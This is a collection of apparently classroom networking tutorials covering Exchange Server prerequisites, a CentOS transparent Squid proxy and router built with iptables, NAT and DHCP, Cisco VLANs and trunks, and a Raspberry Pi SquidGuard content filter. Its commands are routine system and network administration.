• • Server 2003 (64 bit) and Exchange Server 2007 (64bit)
• • Server 2003 (32 bit) and Exchange Server 2007 (32bit) - If you can only run 32 bit

{loadposition adposition6}Hardware Requirements

Exchange Server 2007/2010

Pre-Installation Checklist

For an install of Exchange Server 2007/2010 to work you will need the following things installed or added to your Windows Server platform. (3, 4, and 5 below are installed by default when installing Server 2008 or using the Exchange setup wizard):

1. Active Directory -  (add role)
   
2. DNS - (add role)
3. The server will need to be a Domain Controller (dcpromo) and Global Catalog Server
4. .NET framework
   
5. Microsoft Management Console (MMC)
6. Windows Power Shell
7. Microsoft IIS - (add role)
8. WWW Publishing Services - (add role):
         You may need to specify many of the IIS services (like IIS 6.0 and XML 6.0) and make sure the WWW server is running
9. Net.Tcp Port Sharing Service will need to be set to automatic (Go to Start > Run > services.msc > and look for Net.Tcp Port Sharing)

{loadposition adposition7}The Exchange Server 2007/2010 setup wizard makes the process a lot easier. The wizard will run through a checklist of items to make sure your system meets the necessary requirements. If your computer does not meet the requirements you will be prompted to search and install the necessary tools that the installation requires. 

Exchange Server Mail Roles

When installing Exchange Server you need to decide which specific mail roles or servers you will need. There are five different servers within Exchange Server that you can install:

In this class you will need to install the Mailbox, Client Access and Hub Transport servers. The Unified Messaging Server and Edge Transport Servers are typically installed on separate servers and are not needed for a small test purposes installation.

{loadposition adposition4}

Video Tutorials 

Install Active Directory, DNS and IIS and promote the server to a DC and GCS

{loadposition adposition8}

{loadposition adposition5}Overview

It is useful to protect your network, by filtering web requests and other types of traffic, a proxy server is designed to do this. You can create a Linux proxy server using Squid and SquidGuard, and configure network settings on your user's browsers to access the proxy server which will then apply rules that will filter the requests. However, that can be bypassed by the host computer.

A stronger alternative is to create a transparent proxy server and configure your router to forward all web related requests to the proxy server, that way your network hosts are forced to go through the transparent proxy. A potential problem with that scenario is that you need to have a fairly decent router, which can forward interior traffic on a specified port, to the proxy server on the local area network. A third alternative is to make your transparent proxy server also handle routing, NAT, DHCP, and DNS. It would seem like that would be a huge undertaking, but it can actually be done fairly quickly, using a computer and a distribution of Linux.

Lab Outline

{loadposition adposition6}To create a Linux proxy server that also functions as a router and more, it is recommended to use a server distribution of Linux like CentOS Linux, which is the freely distributed server equivalent to RedHat Enterprise Linux. Along with Debian ,CentOS is one the most popular server distributions of Linux available. For this lab, we download and burn CentOS 6.2, i386 (32bit) or x86_64 (64bit), ISO DVDs Parts 1 and 2. Pick a CentOS 6.2 mirror with Direct DVD downloads and download the DVD iso files, to burn as installation DVDs. 

Once you have the CentOS installation DVD iso files downloaded and burned to DVD you need to install the operating system to a computer. You can choose to install to an actual computer or to a virtual computer (virtual machine). In order to do this lab from home, and if you do not have a lot of extra computers lying around, I recommend doing the whole project virtually through the use of virtual machines. For a virtualization platform, I recommend downloading either VMware Player or Virtualbox.

If you decide to follow along with the video tutorials and set up a CentOS server virtual machine and convert it into a router, remember that the IP addressing scheme will need to be modified to work with your personal network. Just because my wireless network uses a 192.168.2.0 /24 local addressing scheme does not mean that yours does also, in fact your network most likely uses a different scheme like 192.168.1.0 /24.

Network diagram of a CentOS proxy server and router using virtual machines

In the lab at the college we installed CentOS to actual physical computers. Normally, I recommend using computers with two network interface cards (NICs) installed, but the computers we had available to us had only one network interface card (NIC). This posed a challenge since the traffic would need to flow through the computers, from one network to another, implying the need for two network interface cards. We fixed this problem by configuring VLANs, and assigning IP addresses to subinterfaces on the computer's single NIC. We then connected to a switchport configured for trunking with the same VLANs as we created on the computer.   

Network diagram of a CentOS proxy server-router implementation using a lab computer
with only one network interface card (NIC) and a switch configured with VLANs and trunks

Lab Steps Overview (virtualized machines or physical machines)

a. Understand the benefits of a transparent proxy and a Linux server that can also route, NAT, etc. Plan and diagram your lab. See video tutorial part 1 below.

b. Download CentOS installation ISO files, i386 or x86_64, DVDs. See Lab Outline above and video tutorial part 2 below.

c. To do this lab on a physical computers you will need one computer for the CentOS server, preferably with two NICs, but one is okay too, and another computer for a test LAN host. 

To do this lab virtually using a virtual platform like VMware or Virtualbox, first create a new virtual machine for the the Linux operating system. You will probably need to choose RedHat Enterprise 32 bit or 64 bit and walk through all the settings. At the end, configure your virtual CD/DVD to boot to the CentOS installation ISO file that you downloaded. Make sure to add or enable to virtual network interfaces (NICs). Set the first NIC to Bridged Networking mode and the second NIC to NAT mode (then once it is saved change it to again to LAN segment mode), in Virtualbox save the second NIC to Interior Network mode. See video tutorial part 2 below.

d. Configure network addressing on your server's two network interfaces as well as your test host's network addressing. See video tutorial part 3 below.

e. Configure routing and NATing using iptables on your server. See video tutorial part 4 below.

f. Install and configure Squid as a transparent proxy server. Configure iptables to port-forward web traffic to the server on port 3128 (Squid). See video tutorial part 5 below.

g. Secure your server by configuring iptables to accept and reject specific types of traffic. Install and configure DHCP server on your CentOS server in order to hand out IP addresses on your local network. See video tutorial part 6 below.

Lab Command Steps

Here is a list of the commands used in this lab project:

1. If you are working in my lab or have a computer with only one network card (NIC) jump to step 2. If you are using a virtual or physical computer with two NICs (e.g. eth0 and eth1) you will  need to configure each NIC with the command below, then jump to step 6. You can dynamically receive an IP address through DHCP coming from your router/gateway on eth0, click on the network manager in the upper right of the task bar and click "auto ethernet" or just click on "eth0" to activate DHCP. Then you will need to manually configure the second NIC using an ifconfig command from the terminal (e.g. ifconfig eth1 192.168.111.1) you will need to have root access to do this. After you have activated DHCP on eth0 and manually configured eth1 use the ifconfig command to check your interface ip addresses to see that you have an address for eth0 and eth1. You are now ready to jump to step 6.
su - 
ifconfig eth1 192.168.111.1
ifconfig

2. If you are working in my lab or you have a computer with only one network interface card (NIC), you will need to configure trunking and two VLANs (e.g. 110, 111) on the CentOS Linux server (for students with a physical computer with only one NIC)
vconfig add eth0 110 (in my college lab we use VLAN110 for the 192.168.11.x network)
vconfig add eth0 111 

vconfig rem eth0 111 (removes a VLAN trunk)

3. To configure sub-interfaces in order to assign an IP address to each VLAN, in our classroom lab we use VLAN110 for the 192.168.11.0 network.
ifconfig eth0.110 192.168.11.xxx
ifconfig eth0.111 192.168.111.xxx 

4. To configure a default gateway/route
route add default gw 192.168.11.1

5. To configure DNS servers
echo "nameserver 4.2.2.2" > /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf

6. To add kernel support for IP forwarding (routing) we set a flag with the following command
sysctl -w net.ipv4.ip_forward=1

7. To set up NATing we can configure the iptables NAT table for masquerading.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  (assuming eth0 is the outside interface)
or
iptables -t nat -A POSTROUTING -o eth0.110 -j MASQUERADE  (assuming the eth0.110 sub-interface is the outside interface) 

8. To install the Squid proxy server
yum install squid
cd /etc/squid/squid.conf

{loadposition adposition7}9. Edit the the squid.conf file and change the following line to enable transparent proxy mode:
http_port 3128
to
http_port 3128 intercept

10. Issuing one of the following commands will restart the Squid service or reload the configuration file
service squid restart
service squid reload

11. Add an entry to iptables NAT table to port-forward inbound traffic on the inside interface (LAN side) to the Squid server on port 3128 (assuming eth1 is the inside interface with the IP address 192.168.11.1)

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to (cont.) 192.168.111.1:3128

12. To get routing and forwarding to work correctly you will also need to remove some statements from the iptables tables that reject traffic. The following lines will remove reject statements from the filter INPUT iptable chain and the FORWARD iptable chain.
iptables -t filter -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -t filter -D FORWARD -j REJECT --reject-with icmp-host-prohibited

From first glance, it seems that there is a rule in the iptables INPUT chain (third line) that accepts any protocol from any source to any destination. The following statement would delete the third line of the filter table INPUT chain, the "accept any anywhere anywhere" line: <iptables -t filter -D INPUT 3> but do not use it, because as it turns out, that particular line has information that does not appear in the output of an <iptables -L> command. Try using the following command and then compare it to the results of the <iptables -L> command:
iptables-save

You can see that the third line (-A INPUT -i lo -j ACCEPT) is actually accepting all input on the loopback (lo) interface, and since it is only the loopback interface (i.e. 127.0.0.1) it is not a problem in the iptables, indiscriminately accepting all input on the outside interface. So to clarify, in the following three line commands (see below), the first command show the current iptables rules, the second command removes line 3 (-A INPUT -i lo -j ACCEPT) which is the line that ACCEPTs packets on the loopback interface, filter table, INPUT chain. Finally, the third line below replaces it. To learn how to do this I referred the man pages for iptables <man iptables>.
iptables-save
iptables -t filter -D INPUT 3
iptables -t filter -I INPUT 3 -i lo -j ACCEPT

13. Now you can look at your iptables, default filter table, and nat table, using the following commands
iptables -L -t filter
iptables -L -t nat  

14. Now you can add (append) to the iptable filter table with the following commands, to accept input on port 3128 for Squid, and reject all other types of traffic
iptables -t filter -A INPUT -p tcp --dport 3128 -j ACCEPT
iptables -t filter -A INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -L -t filter

15. The following commands and instructions are used to install and configure a DHCP server in CentOS. You will need elevate to root access, run updates, then install:
su -
yum install updates
yum install dhcp

16. You should see that the DHCP server fails on starting up, this is because we have not configured it yet. To configure the DHCP server we need to edit the dhcpd.conf file located in /etc/dhcp.
cd /etc/dhcp
ls

17. You should see a file called dhcpd.conf . You will want to edit the file in a text editor like Vim or Nano.
vim /etc/dhcp/dhcpd.conf
or
nano /etc/dhcp/dhcpd.conf

Here is a screenshot of my dhcpd.conf file after I edited it in Vim. The cat command is used to output the file to the terminal for viewing. The lines that begin with # are comments and not active configurations. You could duplicate what you see in my configuration file below, replacing every line that has 192.168.11.x ip addressing with your own network number, like 192.168.1.x, etc.:
cat /etc/dhcp/dhcpd.conf

{loadposition adposition8}

IPTABLES Overview

The iptables consists of four separate tables: filter, nat, mangle, and raw. Each table has a set of rules or chains.

filter - the filter table is the default table not specified by the -t argument. The filter table has three chains: INPUT for traffic destined for a local socket, FORWARD for packets being routed through the server, and OUTPUT for packets generated locally on the machine

nat - the nat table is consulted when new connections are generated. The nat table has three chains: PREROUTING, OUTPUT, and POSTROUTING

mangle - the mangle table is used for specialized packet alteration. The mangle table has the following chains: PREROUTING, POSTROUTING, INPUT, FORWARD, and OUTPUT.

raw - the raw table is used for configuring exemptions from connection tracking.  

Video Tutorials

In part 1, I outline creating a Linux proxy server and router and I diagram the network 

In part 2, I create the VMware virtual machine with two NICs and install CentOS

In part 3, I configure network addressing on the CentOS server and a Fedora client

In part 4, I review network addressing, how to do the lab if the server has only one network interface.
I also set up routing and NATing on the CentOS server

In part 5, I install Squid on the CentOS server and configure it to be a transparent proxy.
I configure the iptables NAT table, to portforward all local web traffic to the CentOS server on port 3128. 

In part 6, I continue to configure iptables and I install and configure DHCP server on the CentOS server. 

Overview

VLANs - A switches is used to set up a local area network (LAN). A VLAN stands for a virtual local area network. By default, all of the ports on a Cisco switch are part of the same default VLAN (VLAN1) and therefore the same network. A VLAN is a network and a network is a broadcast domain. If you configure various switch ports for separate VLANs, then the devices on those ports will belong to separate VLANs and therefore, will be segmented into separate broadcast domains and networks. This is effectively like dividing a switch into multiple switches. This is cost effective, because instead of having multiple switches, each for a different network, you can have one switch configured for multiple VLANs and you can assign the ports on that switch to belong to whatever VLAN you need the host to belong to.

{loadposition adposition5}VLAN Types

Data VLAN - A data VLAN carries only user data not management data, control data or voice data.

Default VLAN - On a Cisco switch the default VLAN is VLAN1. This means that by default, when a Cisco switch boots up for the first time all the ports are automatically assigned to the default VLAN, VLAN1. You cannot delete or rename VLAN1 but you can assign the ports on the switch to a different VLAN. It is considered best practice to make all of the user ports on the switch belong to a different default VLAN, one other than VLAN1. In this way, control data such as CDP and STP (spanning tree protocol) which are by default carried on VLAN1 would be on a separate VLAN from user data. 

Native VLAN - The native VLAN, if not explicitly configured, will default to the default VLAN, (VLAN1). The Native VLAN is configured for an 802.1Q Trunk port. 802.1Q trunks carry traffic from multiple VLANs by tagging the traffic with VLAN identifiers (Tagged Traffic) which identifies which packets are associated with which VLANs, and they can also carry non VLAN traffic from legacy switches or non 802.1Q compliant switches (Untagged Traffic). The switch will place untagged traffic on the Native VLAN by using a PVID identifier. Native VLAN traffic is not tagged by the switch. It is a best practice to configure the Native VLAN to be different than VLAN1 and to configure it on both ends of the trunk.

Management VLAN - The management VLAN is any VLAN you configure to allow a host to connect to the switch and remotely manage it. The management VLAN will need to be configured with an IP address and subnet mask to allow a manager to connect to the switch by either a web interface (HTTP), Telnet, SSH, or SNMP.

{loadposition adposition6} VLAN ID Ranges

Normal Range

• 1 to 1005
• VLAN1 (default), created by default, cannot be deleted
• VLAN1002-1005 (Token Ring and FDDI default), created by default and cannot be deleted  
• Stored in the VLAN.dat file in Flash memory

Extended Range

• 1006 - 4094
• Extended VLAN range used by ISPs
• Stored in Running-Config
  

Trunks - If you have a switch that has ports variously configured on four different VLANs, then that switch has four different networks on it. When you connect that switch to a router or to another switch you will need four ethernet connections or links, one for each VLAN/network. A more cost effective way to connect a switch with multiple VLANs to a router or switch would be to configure a Trunk. A Trunk is a special kind of port configuration which allows multiple VLANs to travel over one link. This way multiple networks can travel over one trunk instead of wasting valuable ports to connect from switch to switch or switch to router. A Cisco trunk by default uses the 802.1Q protocol. The 802.1Q protocol places and strips VLAN tags on packets to identify which VLAN they belong to.

CLI Commands

switch#show vlan
switch#show interfaces trunk

switch(config)#vlan <vlan number>
switch(config-vlan)#name <vlan name>

switch(config)#interface fa0/x
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan <1-4096>

switch(config-if)#switchport mode trunk
switch(config-if)#switchport trunk allowed vlan <1-1005>
switch(config-if)#switchport trunk native vlan <1-1005>

Configuring VLANs and Trunks

In the video tutorial below I demonstrate how to configure VLANs and Trunks on a Cisco switch using Packet Tracer.

{loadposition adposition9}

{loadposition adposition8}

Turn a Raspberry Pi into a Web Filter Proxy with SquidGuard Overview

{loadposition adposition5}Most routers for the home don't do a very good job at filtering objectionable web content. One possible solution is to turn a Raspberry Pi into a proxy web filter that can protect users on your home network. In this lab, I turn a Raspberry Pi running the Raspbian Linux operating system into a robust web proxy that filters objectionable web sites. In order to turn the Raspberry Pi into a web proxy I install and configure Squid and SquidGuard, and then I download and configure a blacklist file which is available for personal use through a creative commons license. This lab focuses on turning the Raspberry Pi into a standalone proxy server that can be reached by changing the network clients web browser proxy settings, or by configuring the router to direct web traffic to the proxy server. In a follow up lab, you could configure the Raspberry Pi as a transparent inline proxy server.

Step-by-step instructions

First, I recommend updating your repositories and then installing the program locate and updating the index/database of file locations. This will help you if you need search for the file paths to the Squid and SquidGuard configuration files. After installing Squid and SquidGuard you will want to run the sudo updatedb command again in order to make the newly installed files indexed and searchable with locate.

$ sudo apt-get update
$ sudo apt-get install locate
$ sudo updatedb

1. Install Squid, start it, and set it to start on boot

$ sudo apt-get install squid
$ sudo update-rc.d squid enable

Use netstat to check to see if Squid is listening on port 3128, also using ps notice that one of the process ids that Squid uses is proxy:proxy for the user and group

$ sudo netstat -antp |grep squid
$ sudo ps -aux |grep squid

2. Edit the Squid configuration file and then reload Squid. Notice, that I run updatedb and then use locate to find the location of the squid.conf file

$ sudo updatedb
S sudo locate squid.conf
$ sudo nano -c /etc/squid/squid.conf

on line 676 uncomment the line #http_access allow localnet

http_access allow localnet

http_port 3128

$ sudo service squid reload

$ sudo service squid restart

3. Now that Squid is running you can test it from another computer on the network by going to another computer and changing the settings in Firefox or Chrome to point to the Squid web proxy on the Raspberry Pi. Open Firefox and go to File > Options > advanced > network tab > connection settings > manual proxy configuration

and set it to: <the ip address of the computer/RPi running squid>:3128

*Note: In order to test the Squid proxy server from another computer you will need to make sure that the proxy server's firewall is not blocking outside requests. Depending on your distribution of Linux the Linux firewalld or iptables firewall can be actively blocking outside requests. You will need to add a rule to allow requests on port 3128. On the Raspbian operating system by default there should be no firewall activated, but just in case, you can turn off the iptables firewall using the following command:

$ sudo service iptables stop

4. You can monitor the access log to see it working

$ sudo tail -f /var/log/squid/access.log

Now browse the web in Firefox, or the web browser of your choice to see if you are able to receive webpages through the Squid proxy. If you are able to successfully reach websites, then the Squid proxy is working correctly and allowing web requests. Look to the output of Squid's access.log file to see the requests reaching Squid (issue the tail command shown above)

{loadposition adposition9}

$ sudo apt-get install squidGuard

6. Now that SquidGuard is installed, you will want to download a blacklist of websites and domains that you can block with SquidGuard. You can find more information at http://squidguard.org on SquidGuard and where to find blacklists. A great resource is located at http://dsi.ut-capitole.fr/blacklists/ which has an extensive blacklists.tar.gz file under a "creative commons" license. The website http://www.shallalist.de has a similar downloadable blacklist with similar license terms. You will find links to other commercial blacklist sites as well. For this lab, I recommend downloading the shallalist.tar.gz file from http://www.shallalist.de. You can download it from the command line using wget or from the gui using a webbrowser. Download the blacklist file to your Downloads or home folder but before you install a full blacklist let's create a testdomain file with test domains for SquidGuard to practice blocking

$ cd /var/lib/squidguard/db
$ sudo nano testdomains

type in three lines of text to add some test-domains to block:

$ cd /etc/squidguard
$ sudo cp squidGuard.conf squidGuard.conf.bak
$ sudo nano -c /etc/squidguard/squidGuard.conf

dest test {
     domainlist testdomains
}

$ sudo apt-get install apache2
$ cd /var/www/
$ sudo nano blocked.html

<html>
<head>
<title>Blocked!</title>
</head>
<body>
<h1>You have been blocked by Raspberry Pi administrator!</h1>
</body>
</html>

Save and exit

9. Now compile the SquidGuard blacklists and change ownership of the files that need to be accessible by Squid

$ sudo squidGuard -b -d -C all
$ sudo chown proxy:proxy /etc/squidguard/squidGuard.conf
$ sudo chown -R proxy:proxy /var/lib/squidguard/db
$ sudo chown -R proxy:proxy /var/log/squidguard

10. Edit the squid.conf file and then reload Squid

url_rewrite_program /usr/bin/squidGuard

$ sudo service squid reload

11. Now open the Firefox browser from another computer and test to see if the domains listed in the testdomains file in step 6 are successfully blocked. Domains not listed in the testdomains file should be allowed. In other words, from another computer with the web browser configured with the proxy settings of the Raspberry Pi's ip address and port number 3128, try browsing to msn.com or one of the domains listed in the testdomains file that you created in step 6

$ cd ~/Downloads
$ tar -xzf shallalist.tar.gz
$ ls
$ sudo cp BL -R /var/lib/squidguard/db
$ cd /var/lib/squidguard/db

Now recursively change permissions on the BL blacklists folder so you can list through the various blacklist categories that you may wish to activate. You will need to know the name paths of the categories, folders and files that you will want to compile to work with SquidGuard 

$ sudo chmod -R 755 /var/lib/squidguard/db/BL
$ ls /var/lib/squidguard/db/BL

13. Now you can edit the squidGuard.conf file to configure it to begin blocking undesirable content

$ sudo nano -c /etc/squidguard/squidGuard.conf

{loadposition adposition8}

In the config file, change the following lines in red. Be careful in your edits, incorrect syntax will cause squidGuard to fail. You will need to remove 4 lines of comments from the dest adult block as well as changing the paths to the content you intend to block. Notice under dest adult that I change the paths under domainlist and urllist to match the content and paths in the BL folder

dest adult {
   domainlist        BL/porn/domains
   urllist        BL/porn/urls
#  expressionlist    BL/porn/expressions
#  redirect http://admin.foo.bar.de/cgi/blocked?clientaddr=%a+clientname=%n+clientuser=%i+clientgroup=%s+targetgroup=%t+url=%u

$ sudo squidGuard -b -d -C all
$ sudo chown -R proxy:proxy /var/lib/squidguard/db

15. Reload Squid and then use Firefox from another computer to test to see if Squid and SquidGuard are blocking websites with known adult content. You may want to execute this test privately or with the majority of the web browser dragged off screen ... just in case it doesn't work!

$ sudo service squid reload

{loadposition adposition11}